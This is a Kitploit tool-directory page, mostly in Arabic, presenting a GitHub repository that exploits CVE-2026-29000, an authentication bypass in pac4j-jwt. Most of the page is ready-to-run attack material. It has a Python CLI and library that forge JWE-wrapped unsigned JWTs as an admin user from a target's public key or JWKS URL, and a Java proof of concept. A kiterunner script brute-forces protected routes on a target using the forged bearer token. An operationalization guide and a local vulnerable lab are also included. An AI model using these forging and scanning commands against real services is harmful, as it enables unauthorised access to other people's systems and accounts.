Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-29000 — # Forge JWE-wrapped unsigned JWTs to bypass pac4j-jwt signature verification (CVE-2026-29000) and authenticate as any user; includes Python CLI, library, Java PoC, and kiterunner route scanning. قم بتزوير رموز JWT غير موقعة ومغلّفة بتنسيق JWE لتجاوز التحقق من التوقيع في pac4j-jwt (CVE-2026-29000) والمصادقة كأي مستخدم؛ يتضمن واجهة سطر أوامر بلغة Python، ومكتبة، ونموذج إثبات مفهوم بلغة Java، وفحص المسارات باستخدام kiterunner. | Kitploit
أدوات/GitHubGitHub/kernelzeroday/cve-2026-29000
المصادقة والترخيصالاستطلاعتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويباختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

GitHub
kernelzeroday/cve-2026-29000

CVE-2026-29000

عرض المستودع
93منذ 5 أشهرلم تتم المراجعة بعد

# Forge JWE-wrapped unsigned JWTs to bypass pac4j-jwt signature verification (CVE-2026-29000) and authenticate as any user; includes Python CLI, library, Java PoC, and kiterunner route scanning. قم بتزوير رموز JWT غير موقعة ومغلّفة بتنسيق JWE لتجاوز التحقق من التوقيع في pac4j-jwt (CVE-2026-29000) والمصادقة كأي مستخدم؛ يتضمن واجهة سطر أوامر بلغة Python، ومكتبة، ونموذج إثبات مفهوم بلغة Java، وفحص المسارات باستخدام kiterunner.

مشاركة

CVE-2026-29000: تجاوز المصادقة في pac4j-jwt JwtAuthenticator

بناء كامل: تقرير فني، PoC بلغة Java داخل العملية، أداة سطر أوامر ومكتبة Python لتزوير الرموز، واختبارات.

ملخص

  • CVE: CVE-2026-29000 (CVSS 10, CWE-347)
  • المتأثر: pac4j-jwt < 4.5.9 / < 5.7.9 / < 6.3.3 عند استخدام JWE + إعداد التوقيع
  • المشكلة: PlainJWT (غير موقّع) المغلف بـ JWE يتجاوز التحقق من التوقيع؛ يمكن للمهاجم الذي يمتلك فقط المفتاح العام RSA للخادم تزوير الرموز والمصادقة كأي مستخدم.

انظر WRITEUP.md للتفاصيل ومتطلبات PoC.

الهيكل

المسارالوصف
WRITEUP.mdملخص CVE، السبب الجذري، الإصدارات المتأثرة، متطلبات PoC، المراجع
RECON.mdماذا تضع (اكتشاف الادعاءات، ادعاءات خاصة بالتطبيق) وأين تقدم (الترويسات، ملفات تعريف الارتباط، العثور على نقاط النهاية المحمية)
OPERATIONALIZATION.mdما هو مطلوب للتشغيل في الإنتاج: التغليف، الإعداد، الأمان، الأتمتة، المراقبة، الصيانة
scripts/kr_scan.pyتزوير رمز وتشغيل kiterunner (~/bin/kr) مع Authorization: Bearer لاختبار/فحص مسارات API المحمية
examples/سكربتات أمثلة: forge_and_curl.sh, forge_and_kr.sh
lab/تطبيق Flask مختبري (نقطة نهاية JWE + JWKS) لاختبار تزوير الرموز
poc/PoC بلغة Java Maven (تجاوز داخل العملية ضد pac4j-jwt 6.0.3)
token_forge/حزمة Python: تزوير PlainJWT مغلف بـ JWE من PEM أو عنوان JWKS
tests/اختبارات Pytest للادعاءات، التزوير، المفاتيح، CLI
requirements.txtتبعيات Python (jwcrypto, requests, pytest)

Python (تزوير الرموز)

الإعداد

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate   # أو .venv\Scripts\activate على Windows
pip install -r requirements.txt

تشغيل CLI

root@kitploit:~
# من PEM (أنشئ باستخدام: openssl genrsa 2048 | openssl rsa -pubout)
python -m token_forge --public-key /path/to/pub.pem --subject admin --roles "ROLE_ADMIN,ROLE_USER"

# من عنوان JWKS
python -m token_forge --jwks-url https://target/.well-known/jwks.json --subject admin

# ادعاءات إضافية (لاكتشاف خاص بالتطبيق): --claim [email protected] --claim key=value
# خيارات: --exp-sec, --jwks-kid, --log-file, --enable-file-logging, --verbose

المخرجات: سطر واحد (JWT مزور)؛ استخدمه كـ Authorization: Bearer <token>.

أتمتة Kiterunner (kr)

يتطلب kr في ~/bin/kr. قم بتزوير رمز وتشغيل kr brute (أو kr scan) مع مصادقة Bearer لاكتشاف المسارات المحمية:

root@kitploit:~
python scripts/kr_scan.py https://target.com --jwks-url https://target.com/.well-known/jwks.json
python scripts/kr_scan.py https://target.com --public-key pub.pem -w paths.txt -o json --dry-run

انظر RECON.md §4 للخيارات (--subject, --roles, --claim, -A, --scan, إلخ).

المكتبة

root@kitploit:~
from token_forge import forge_token, load_public_key_from_pem, load_public_key_from_jwks_url

with open("pub.pem", "rb") as f:
    key = load_public_key_from_pem(f.read())
token = forge_token(key, subject="admin", roles=["ROLE_ADMIN"], exp_sec=3600)

الاختبارات

root@kitploit:~
pytest -vv --tb=short --maxfail=1
# أو مع التحذيرات كأخطاء:
pytest -vv -W error -W always --tb=short --maxfail=1

PoC بلغة Java

البناء والتشغيل (يتطلب Java 11+ و Maven)

root@kitploit:~
cd poc
mvn -q compile exec:java -Dexec.mainClass="Poc"
# أو رمز فقط (بدون تحقق داخل العملية):
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--token-only"
# مع subject/roles مخصص:
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--subject user --roles ROLE_A,ROLE_B"

المتوقع: [BYPASS] Authenticated as: admin#override والأدوار عند التشغيل داخل العملية.

الاختبارات والتغطية

root@kitploit:~
pytest -vv --cov=token_forge --cov-report=term-missing
pytest -vv --cov=token_forge --cov-report=html  # ثم افتح htmlcov/index.html

Docker

root@kitploit:~
docker build -t cve-2026-29000 .
docker run --rm cve-2026-29000 pytest -vv --cov=token_forge --cov-report=term-missing

المختبر (الهدف الضعيف)

تطبيق Flask يقبل JWE ويعيد الادعاءات (لاختبار التزوير + curl/kr).

root@kitploit:~
docker compose up -d lab
TOKEN=$(python -m token_forge --jwks-url http://localhost:8080/.well-known/jwks.json 2>/dev/null)
curl -H "Authorization: Bearer $TOKEN" http://localhost:8080/api/me

انظر lab/README.md.

المراجع

  • CodeAnt AI – PoC كامل وتحليل
  • استشارة أمنية من pac4j
  • OpenCVE CVE-2026-29000
تنزيل الأداة